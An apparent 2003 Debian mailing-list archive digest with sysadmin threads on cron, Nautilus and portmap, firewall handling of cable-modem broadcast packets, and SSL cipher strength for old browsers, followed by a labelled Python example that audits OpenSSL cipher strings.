> Yes, of course. But in this case I will invoke rotatelogs... I don't
> like it.

As you've exhausted the other possibilities, why not
read the fine manual: http://httpd.apache.org/docs/logs.html

-- 
Jamie Heilman   http://audible.transient.net/~jamie/
"Most people wouldn't know music if it came up and bit them on the ass."
-Frank Zappa





cronjob stuck

2003-06-10 Thread Dale Amon
Just ran across an interesting prob, wondered if
anyone else has seen it. I added a repeating entry
to /etc/cron.d/foo that ran every */5 minutes. I
then tried to get rid of it... It will not die.

I moved the file out of /etc/cron.d and it still
is running.

I cp'd the file and deleted the old one in case
cron remembered the inode (rather a long shot).
No change.

I did /etc/init.d/cron stop; /etc/init.d/cron start;
still it repeats.

I did updatedb and locate cron; can't find it cached
anywhere.

cron doesn't seem to have any flush options and no
indication that it should be caching across executions.

I could certainly (I hope!) get rid of it by rebooting
but I can't do that with this system at this time.

Has anyone else had trouble making vixie cron STFU? Am
I hallucinating? Is my brain in need of Coke and M&M's?

-- 
--
   IN MY NAME:Dale Amon, CEO/MD
  No Mushroom clouds over Islandone Society
London and New York.  www.islandone.org
--





Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst
Hello Chris

Thank you for your answer!

On Dienstag, 10-Jun-03 at 21:39:47, Chris Caldwell wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Andreas Wüst sent the following message Today:
> 
>> No matter if I try netstat -apn or netstat -atunp as someone
>> in private, it gives the same result as netstat -tu -l
> -ee -p, apart AW> from the established connections, namely there is
> nothing listening in AW> port 111.
> 
> Have you tried "rpcinfo -p localhost" to see if Nautilus is
> registering a connection to portmap?

No, I haven't yet, but will do!

> The newer Gnome installs
> (gnomevfs) depend on fam, which depends on portmap.

Umm, I thought woody gnome wouldn't depend on fam, no?

> I don't
> believe there is a direct dependency from core Nautilus to
> portmap, but possibly some of the Nautilus extras or vfs extras
> are causing the dependency.

Yeah, it's strange. Even stranger, that nautilus won't start at all, if
the connection to port 111 fails!!

-- 
Best wishes,
Andi





Re: strange broadcast packets

2003-06-10 Thread Andreas Wüst
Hi Phillip

On Tuesday, 10-Jun-03 at 19:59:40, Phillip Hofmeister wrote:

> On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas Wüst wrote:
>> Hi
>> 
>>> Hello,
>>> 
>>> isn't perhaps 10.208.64.1 your dhcp server and aren't these replies to
>>> dhcp requests from clients?
>> 
>> No lan here.. !!
> 
> That IP address might be used by your cable modem service as an
> internal management address to hand out IP addresses. Or it might even
> be your bridge (cable modem). In either case, this is not something to
> be worried about. In fact I made a special rule in my iptables so such
> packets don't get logged.

Cool, thanks a lot for your help!!

So, can I happily block them? As it
seems, unfortunately I have to keep udp port 68 stateful open, to renew
the dhcp lease, no?

-- 
All the best, and really thanks a lot for your answers,
Andi





Re: cronjob stuck

2003-06-10 Thread Dale Amon
On Tue, Jun 10, 2003 at 10:22:09PM +0100, Dale Amon wrote:
> Has anyone else had trouble making vixie cron STFU? Am
> I hallucinating? Is my brain in need of Coke and M&M's?

Actually I've now done pretty much just that and 
discovered it was a strange coincidence... some other
process was doing exactly the same thing my cronjob was
to do with exactly the same 5 minute interval between
runs and one minute off the execution times I expected!







RE: OPENSSL

2003-06-10 Thread Reckhard, Tobias
On Tue, Jun 10, Stefan Neufeind wrote:
> I'm using a 128-bit-cert.

You're using an X.509 certificate. The grade of symmetric encryption
negotiated between browser and web server is (at least in theory)
independent of the certificate.

> But browsers that support less encryption 
> (e.g. IE that comes with WinNT4) can't access my SSL-pages because 
> the encryption doesn't allow degradation.

The original NT shipped with IE2. Are you sure you want people to still use
that?

> Is there any way to solve 
> this prob? Using Apache with an official SSL-cert.
> 
> PS: This just came to my mind when you said "step-up" - cause in my 
> case it would be a "step-down", right?

I could imagine that IE2 has numerous problems with SSL. It could well be
one of the browsers that need to see step-up certificates before they
perform 128-bit symmetric cryptography. But I don't know.

Make sure you've allowed your Apache to use small key sizes first. I
wouldn't use them, but you should be sure that it's not your server that's
refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to apply the
latest service pack and preferably install IE6SP1 plus the Hotfixes that
have been released since.

And then they should install a better browser and use that instead. ;->

Cheers,
Tobias
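
An added example, not part of Tobias's message and not Apache or mod_ssl code: a short Python audit of which symmetric key strengths an OpenSSL cipher string admits. It runs with no certificate loaded, which illustrates the point above that the negotiated strength comes from the server's cipher list rather than from the X.509 certificate. The cipher strings and the 128-bit floor are constructed sample values, and results depend on the local OpenSSL build.

```python
import ssl

# Constructed sample values of the kind found in a mod_ssl SSLCipherSuite
# directive; they are not taken from the thread.
SAMPLE_CIPHER_STRINGS = ["HIGH:!aNULL:!eNULL", "ALL:!aNULL:!eNULL", "EXPORT"]
MIN_BITS = 128  # assumed policy floor for this example


def enabled_ciphers(cipher_string):
    """Expand an OpenSSL cipher string as a TLS server context would.

    No certificate is loaded: the symmetric strengths on offer are decided
    by the cipher string and the local OpenSSL build alone.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    try:
        ctx.set_ciphers(cipher_string)
    except ssl.SSLError:
        return []  # this build has no cipher matching the string
    return ctx.get_ciphers()


def audit(cipher_string, min_bits=MIN_BITS):
    """Split the enabled suites into (strong, weak) by symmetric key strength."""
    strong, weak = [], []
    for c in enabled_ciphers(cipher_string):
        row = (c["name"], c["protocol"], c["strength_bits"])
        (weak if c["strength_bits"] < min_bits else strong).append(row)
    return strong, weak


def strengths_offered(cipher_string):
    """Sorted distinct symmetric strengths (in bits) the string admits."""
    return sorted({c["strength_bits"] for c in enabled_ciphers(cipher_string)})


if __name__ == "__main__":
    for s in SAMPLE_CIPHER_STRINGS:
        strong, weak = audit(s)
        print(f"{s!r}: strengths {strengths_offered(s)} bits, "
              f"{len(strong)} suites >= {MIN_BITS}, {len(weak)} below")
        for name, proto, bits in weak:
            print(f"    WEAK {name} ({proto}, {bits}-bit)")
```

Export-grade (40-bit) suites were removed from OpenSSL in 1.1.0, so on a current build the "EXPORT" string expands to no sub-128-bit suites at all.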

